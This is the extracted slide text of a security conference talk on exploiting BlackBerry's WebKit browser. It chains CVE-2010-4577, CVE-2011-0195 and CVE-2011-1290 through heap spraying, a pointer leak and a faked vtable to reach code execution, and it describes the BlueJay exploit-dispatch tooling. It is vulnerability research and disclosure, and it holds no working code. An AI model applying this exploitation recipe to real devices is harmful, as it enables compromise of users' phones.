BLACKBERRY PWNAGE THE BLUEJAY STRIKES Federico Muttis Core Security Technologies Session ID: HTA-T19 Session Classification: Advanced
INFO @ THE MEDIA http://www.zdnet.com/blog/security/pwn2own-2011-blackberry-falls-to-webkit-browser-attack/8401 http://threatpost.com/en_us/blogs/iphone-blackberry-fall-second-day-pwn2own-031011
INFO @ THE MEDIA
INFO @ THE MEDIA
BLACKBERRY DEVICES WITH KNOWN WORKING EXPLOIT Vulnerable devices (shortened list) Pearl family Curve family (< 9350) Storm family Style 9670 Tour 9630 Bold 9650/9700/9780 Torch 9800
CVE-2010-4577 ARBITRARY READ
CVE-2010-4577 PROOF OF CONCEPT CSS Font Face Parsing Type Confusion Vulnerability http://code.google.com/p/chromium/issues/detail?id=63866
IEEE 754 DOUBLE PRECISION FLOATING-POINT
CVE-2010-4577 CRASH ANALYSIS CSS Font Face Parsing Type Confusion Vulnerability 002ed594 80000000 01718618 chrome_68390000!wtf::stringimpl::create(wchar_t * characters = 0x80000000 "--- memory read error at address 0x80000000 ---", unsigned int length = 0x2cb)+0x24 [c:\b\slave\chrome-official\build\src\third_party\webkit\javascriptcore\wtf\text\stringimpl.cpp @ 99] 80000000 41400000 00000454 chrome_68390000!wtf::string::string(wchar_t * characters = 0x80000000 "--- memory read error at address 0x80000000 ---", unsigned int length = 0x41400000)+0x21
CVE-2010-4577 EXPLOITATION CSS Font Face Parsing Type Confusion Vulnerability Address Size
CVE-2010-4577 EXPLOITATION CSS Font Face Parsing Type Confusion Vulnerability Address Size
A BLUEJAY APPEARS!
DUMPING THE VIRTUAL ADDRESS SPACE BlueJay s early problems Poor man s solution
BLUEJAY AGENT DIAGRAM BlueJay Agent HTTP Push BlueJay Server & Console Exploit dispatcher Memory manager Memory read Pointer Leak Execute code HTML5 Spray HTML5 Edit
DUMPING THE VIRTUAL ADDRESS SPACE BlueJay s helper Java BlackBerry App. Browser running? No Yes Restart browser Reset backlight timer
DUMPING DEMO
DISASSEMBLING AND SEARCHING FOR OLYMPIA BlackBerry s WebKit Browser main() routine
DISASSEMBLING AND LOCATING CVE-2010-4577 CVE-2010-4577 Arbitrary memory read disassembly
BLACKBERRY PROCESS INTERNALS Some syscalls (work in progress...) 0x4 write 0x16 allocexecmem 0x28 shmget 0x2b alloc 0x27 loadlibrary 0x29 shmat 0x2c sem_create 0x2d sem_unlink sem_close 0x41 sendto? 0x46 mkfifo? 0x4a unlink 0x4c mkdir 0x5f open 0x61 lock related (flock/lockf?) 0x67 threads related
CVE-2011-1290 CODE EXECUTION
SEARCHING FOR THE VULNERABILITIES Webkit Integer Overflow near 2011 There is a buffer overflow vulnerability that was released in November 2010 but is still present on the BlackBerry. ( ). To exploit the vulnerability I have to set up the heap in a specifc way so I can overflow a specific structure on the heap. This structure is the internal representation for a piece of text on a website. The vulnerability is in the handling of the text nodes, so this is a good target to overflow. ( ) Once I have a stable way to organize the heap and reliably overflow the pointer to the functions, we can start testing. The first test attempts to redirect execution to code that already exists on the BlackBerry. Instead of the JavaScript nodetype call returning the value 3, I redirect it to existing code elsewhere that returns 0. Now I can control the execution flow in the browser. Willem Pinckaers -
EXPLOITING CVE-2011-1290 CVE-2011-1290 Integer Overflow => Heap Overflow Integer Overflow Heap Overflow
DISASSEMBLING AND LOCATING CVE-2011-1290 CVE-2011-1290 Integer Overflow
DISASSEMBLING AND LOCATING CVE-2011-1290 CVE-2011-1290 Integer Overflow
DISASSEMBLING AND LOCATING CVE-2011-1290 CVE-2011-1290 Integer Overflow => Heap Overflow
DISASSEMBLING AND LOCATING CVE-2011-1290 CVE-2011-1290 Integer Overflow => Heap Overflow
CHAINING THE EXPLOITS
EXPLOITATION RECIPE 1. HTML5-Spray the process s heap with a repeated pattern
EXPLOITATION RECIPE 1. HTML5-Spray the process s heap with a repeated pattern 2. Leak a heap pointer using CVE-2011-0195 Pointer to a valid heap address
EXPLOITATION RECIPE 1. HTML5-Spray the process s heap with a repeated pattern 2. Leak a heap pointer using CVE-2011-0195 3. Walk between [ptr-128k, ptr+128k] looking for the signature Pointer to a valid heap address Pointer to HTML5-Sprayed block ignature signature signature signature signature signature signat HTML5-Spray block
EXPLOITATION RECIPE 1. HTML5-Spray the process s heap with a repeated pattern 2. Leak a heap pointer using CVE-2011-0195 3. Walk between [ptr-128k, ptr+128k] looking for the signature 4. HTML5-Spray-Modify to fake a vtable Pointer to HTML5-Sprayed block ignature sigptr+x signature sigptr+y signature signature shellcode signature signature signat HTML5-Spray block
EXPLOITATION RECIPE 1. HTML5-Spray the process s heap with a repeated pattern 2. Leak a heap pointer using CVE-2011-0195 3. Walk between [ptr-128k, ptr+128k] looking for the signature 4. HTML5-Spray-Modify to fake a vtable 5. Point the code execution exploit to your block 6. Achieve code execution! sigptr+x sigptr+y shellcode HTML5-Spray block
BLUEJAY VS REAL DEVICE sigptr sigptr shellcode HTML5-Spray block
BLUEJAY VS SIMULATOR DEMO
SIMULATOR VS DEVICE WebKit s StyleElement::process() http://immunityinc.com/infiltrate/archives/webkit_heap.pdf
Q & A E-mail: fmuttis@gmail.com / acid@coresecurity.com Twitter: @acid_